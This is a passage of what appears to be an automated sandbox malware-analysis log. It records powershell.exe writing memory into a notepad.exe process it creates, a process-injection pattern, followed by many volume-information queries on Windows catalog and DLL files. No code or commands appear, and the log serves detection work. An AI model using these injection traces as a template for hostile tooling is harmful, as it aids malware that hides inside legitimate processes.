              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
